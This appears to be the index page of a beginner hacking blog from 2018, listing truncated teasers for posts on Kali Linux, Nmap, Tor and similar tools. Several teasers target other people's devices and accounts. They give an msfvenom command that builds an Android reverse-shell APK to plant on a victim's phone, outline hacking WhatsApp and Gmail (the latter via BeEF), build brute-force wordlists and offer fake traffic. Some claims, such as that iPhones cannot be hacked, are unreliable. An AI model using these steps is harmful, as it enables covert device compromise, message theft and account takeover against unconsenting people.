­

SMALLEST PC EVER - RESPBERRY PI 3 -

September 30, 2018 / BY learn hacking
RESPBERRY PI 3  IT IS THE SMALLEST PC EVER YOU CAN BUY THE LINK PROVIDED UP. YOU CAN MAKE YOUR HACKING. YOU JUST NEED IT TO BUY . IF YOU CANT BUY LAPTOP OR PC JUST YOU CAN BUY IT . AS SOON AS POSSIBLE I WILL POST THAT HOW TO MAKE COMPUTER WITH RESPBERRY PI 3  SPECIFICATION:- 1.2GHz 64-bit quad-core ARMv8 CPU,...

Continue Reading

BUY YOUR OWN FAKE TRAFFIC.

September 25, 2018 / BY learn hacking
HERE YOU CAN GET FAKE TRAFFIC FOR FREE 1. MAIL ME 2. SYNTAX  :-  FAKE TRAFFIC                        <YOUR URL>                                                               <HOW MUCH YOU NEED>...

Continue Reading

WHAT IS DOS ATTACK ?

September 25, 2018 / BY learn hacking
IT is  a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic.In simple language it send too much traffic on website host by this speed becomes slow. it can be on the basis of demanding money or ETC. visitors speed will be get slow and creats problem for server.  some dos attack tools...

Continue Reading

HOW TO CREAT PASSWORD(WORDLIST) FOR BRUTEFORCE ATTACK

August 25, 2018 / BY learn hacking
HEY, GUYS TODAY I AM GOING TO TELL YOU THAT HOW TO CREAT WORDLIST FOR BRUTEFORCE ATTACK SO FOLLOW THESE STEPS  1. RUN YOUR KALI LINUX 2. RUN CRUNCH(APPLICATION>PASSWORD ATTACK>CRUNCH) 3. SYNTAX   SIMPLE ONE :-  CRUNCH  (min no. ) (max no. )  ex. crunch 4 8   OTHER ONE :- crunch (min no. ) (max no.) -o (output dictionary) example  crunch 6 8 1234567890...

Continue Reading

HOW TO HACK WHATSAPP (SOCIAL ENGINEERING ) (EXPLANATION)

August 12, 2018 / BY learn hacking
SO, YOU WANTS TO HACK WHATSAPP BUT THIS IS NOT LEAGLE . TODAY I WILL NOT SHOW THE PRACTICAL  TODAY THERE IS ONLY EXPLAINTION . GET STATRTED FIRST SEND SEND THE PAYLOAD IN DEVICE. THE TRY TO LOGIN INTO WHATS APP MEANS ENTER THE PHONE NO. . SO AFTER SENDING , INSTALLING THE PAYLOAD AND LOGIN THE PHONE NO. DUMP THE MASSAGES . AND SEE...

Continue Reading

HOW TO PROTECT USB DRIVE FORM VIRUSES

August 05, 2018 / BY learn hacking
IF YOU NOT WANT TO LEAK OR LOSS YOUR DATA FROM YOUR USB DRIVE THEN FOLLOW THESE STEPS 1. PLUG IN YOUR USB DRIVE 2. PASTE YOUR ALL DATA IN IT 3.THEN OPEN RUN AND TYPE CDM 4. IN CMD TYPE diskpart 5. TYPE list disk( all connected list will be appear) 6. TYPE disk ( disk no.) 7.TYPE attributes disk set readonly...

Continue Reading

HOW TO HACK GOOGLE ACCOUNT USING BEEF

July 29, 2018 / BY learn hacking
beEF IN PREVIOUS POST I SAYS THAT I WILL POST THAT HOW TO USE beEF SO TODAY I AM GOING TO TELL YOU HOW TO HACK GMAIL ACCOUNT USING BEEF ATTACK  ...

Continue Reading

CAN APPLE IPHONE CAN BE HACKED?

July 27, 2018 / BY learn hacking
PEOPLE WHO DON'T USING I PHONE I CAN TELL THEM I PHONE CAN'T BE HACKED BECAUSE  THE PAYLOAD CAN'T BE INSTALLED IN I PHONE . BEEF ATTACK IS ALSO FAILED IN I PHONE IF YOU DON'T KNOW ABOUT BEEF ATTACK AS SOON AS POSSIBLE I WILL POST ON MY BLOG . SO SUBSCRIBE MY BLOG . I HAVE TRIED ON MY PHONE BEEF HAD BEEN FAIILED . IF...

Continue Reading

HOW TO HACK ANDROID ?

July 17, 2018 / BY learn hacking
NOW , I AM GOING TO USE SOCIAL ENGINEERING TRICK AS SOON AS POSSIBLE I WILL ALSO POST FOR WHATSAPP HACKING NOTE:: THIS POST IS ONLY FOR EDUCATION   FOLLOW THESE STEPS  1. RUN YOUR KALI LINUX  2. OPEN YOUR TERMINAL   3. TYPE COMMAND msfvenom -p android/meterpreter/reverse_tcp  lhost='your ip' lport='your port' R > name.apk 4. YOUR PAYLOAD HAD BEEN CREATED AND INSTALL THAT PAYLOAD...

Continue Reading

WHAT IS SOCIAL ENGINEERING?

July 14, 2018 / BY learn hacking
SOCIAL ENGINEERING  SOCIAL ENGINEERING IS NOT MEANS THAT HACKING THOUGH WIFI , BLUETOOTH (SOON I WILL UPLOAD POST) THE HACKERS HACK YOUR MIND IN SIMPLE LANGUAGE THEY USE FOLLOWING TRICKS  1. HACKER CREATE FAKE FB,INSTAGRAM,OR GMAIL PAGE IN WHICH YOU LOG IN AND YOUR PASSWORD AND USERNAME WILL GO TO THE HACKER  2. HACKER CREATE A PAYLOAD AND UPLOAD ON CLOUD AND SAYS YOU TO...

Continue Reading

HOW TO DO PENTESTING ?

July 08, 2018 / BY learn hacking
window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-121973311-1'); THIS POST IS ONLY FOR EDUCATIONAL PERPOUS  THERE IS 2 TOOLS IN KALI LINUX FOR PENTESTING NMAP I HAVE ALREADY UPLOADED POST IN MY BLOG  see here NIKTO NIKTO IS THE BEST AND EASY METHOD FOR PENTESTING. IT IS ALREADY INSTALLED IN KALI LINUX  FOR SQLMAP ATTACK USE THIS OPEN NIKTO...

Continue Reading

WHAT IS BRUTEFORCE ATTACK ?

July 06, 2018 / BY learn hacking
BRUTEFORCE BRUTEFORCE IS THE TRAIL METHOD OF HACKING. IT IS USED FOR PASSWORD CRACKING. IT TRY ALL THE PASSWORD CONTAIN IN WORDLIST. IT IS NOT SURE ALWAYS WILL BE GOING TO CRACK BECAUSE WHEN THE VICTIMS PASSWORD NOT CONTAINED IN WORDLIST IT WILL BE NOT GOING TO CRACK. IN SOME TIME I WILL POST ( WHO TO USE BRUTEFORCE OR FB CRACKING OR...

Continue Reading

HOW TO MULTI BOOT USB

July 04, 2018 / BY learn hacking
USING MULTIBOOTUSB  DOWNLOAD MULTI BOOT USB HERE OPEN MULTI BOOT USB CONNECT YOUR USB CLICK ON BROWSE AND BOROW YOUR ISO IMAGE THEN CLICK ON INSTALL DISTRO (YOUR ONE ISO HAD BEEN INSTALLED ) FOR ONE MORE ISO INSTALLATION AGAIN FOLLOW THESE STEPS ...

Continue Reading

START HACKING WITH ANDROID

June 30, 2018 / BY learn hacking
window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-121694575-1'); I YOU WHATS TO BE AN ETHICAL HACKER BUT YOU CAN'T AFFORD PC OR LAPTOP . NO PROBLEM ! DOWNLOAD THE APK FORM GOOGLE PLAY STORE TERMUX IT CAN RUN ALL LINUX TEMINAL COMMANDS . YOU CAN TAKE YOUR FIRST STEP IN HACKING WITH TERMUX ...

Continue Reading

what is anonymous ?

June 30, 2018 / BY learn hacking
ANONYMOUS IS THE HACKERS GROUP Who are against the government. it organized in 2003. they are black head hackers and they hack websites and give there opinion on hacked websites against government decision. it can  be your neighbor  also. THEY HIDE THERE ID'S TO DO INLEAGEL THINGS wikipedia:-  Supporters have called the group "freedom fighters"[6] and digital Robin Hoods[7] while critics have described them as "a cyber...

Continue Reading

NMAP - tutorial

June 27, 2018 / BY learn hacking
actually now i have started publishing hacking tutorial berore that is was basic things only lets start step1: start kali linux step2: open terminal step3: give command apt-get update step4: after completing open another terminal and give comand "namp http://example.com" and press enter  results in front of you   ...

Continue Reading

how to get more Ghz on low end processor

June 27, 2018 / BY learn hacking
if  your games are lagging but your all requirements are complete like ram GPU etc. but your proccesor is giving low ghz then follow these steps 1.click here to get throttle stop  2.extract the zip file 3.run throttle stop and it will show the following     'setting'      clock modulation> check it to highest point       chipset clock modulation> check...

Continue Reading

WHAT,WHY,HOW NMAP

June 25, 2018 / BY learn hacking
WHAT IS NMAP? Nmap is scanner. in simple language it is website scanner. but according to the wikipedia it is used to discover hosts and services on a computer network, thus building a "map" of the network  . its is used by beginner  hacker . The software provides a number of features for probing computer networks, including host discovery and service and operating-system detection.are extensible by scripts that provide more advanced service detection]vulnerability detection,[3] and other...

Continue Reading

GIT HUB _ REVIEW

June 25, 2018 / BY learn hacking
DON'T KNOW CODING BUT IF YOU KNOW NOT FINDING PLACE TO SHARE IT SEE MY FULL POST . HERE IS PLACE TO GET OR SHARE OVER THE INTERNET. IT IS ALSO CALLED AS HOME OVER 28 MILLION DEVELOPERS. IT IS MOSTLY USED  BY SOFTWARE DEVELOPERS OR HACKERS. SOME HACKERS DO'T KNOW PYTHON SCRIPT SO THEY USE SHARED SCRIPT OF OTHER DEVELOPERS. GIT HUB OFFICIAL ...

Continue Reading

MOST ANONYMOUS BROWSER ? TOR BROWSER - REVIEW- DOWNLOAD

June 25, 2018 / BY learn hacking
ARE YOU A HACKER AND SEARCHING FOR MOST ANONYMOUS BROWSER. SEE MY FULL POST FOR REVIW AND DOWNLOAD WHY YOU NEED ANONYMOUS BROWSER TOR? YOU NEED TO PROTECT YOU PROXY AND PREVENT THAT SOMESONE TO SEE YOUR INTERNET CONNECTION IN THAT CASE YOU NEED TOR BROWSER IT IS PRIVATE BROWSER  DOWNLOAD LINKS BELOW WINDOW 32 AND 64 BIT MAC OS GNU/LINUX 64 BIT...

Continue Reading

oracle VM Virtual box download

June 25, 2018 / BY learn hacking
oracle vm virtual box is a software to creat a virual computer means to creat a  new computer in your computer. you can download by clicking here .if you are using a window os and wants to start hacking and don't wants to loss your data in that condition you can use virtual box.  official website ...

Continue Reading

kali live or virtual machine which is better?

June 25, 2018 / BY learn hacking
kali live:              if you have low end pc you don't whats to use vm ware so you can boot kali linux in usb or dvd i will show the video down if you need help. in live booting there is no any loss of your window os data. but the data which you will save  in kali...

Continue Reading

download kali lunix ios

June 24, 2018 / BY learn hacking
kali lunix is an distribution of lunix it incloude many hacking tools  view all next post to learn how to install kali lunix on vm ware ...

Continue Reading

introducing VM WARE

June 24, 2018 / BY learn hacking
VMware Workstation Pro 14 VMware Workstation Pro is the industry standard for running multiple operating systems on a single Linux or Windows PC.  Workstation 14 Pro improves on the leading desktop hypervisor with VMware Virtual Hardware Version 14 features, including: virtual network simulation, updated support for the latest Windows and Linux operating systems, and new virtualization-based security features. download now VMware ...

Continue Reading

SMALLEST PC EVER - RESPBERRY PI 3 -

RESPBERRY PI 3  IT IS THE SMALLEST PC EVER YOU CAN BUY THE LINK PROVIDED UP. YOU CAN MAKE YOUR HACKING. YOU JUST NEED IT TO BUY . IF...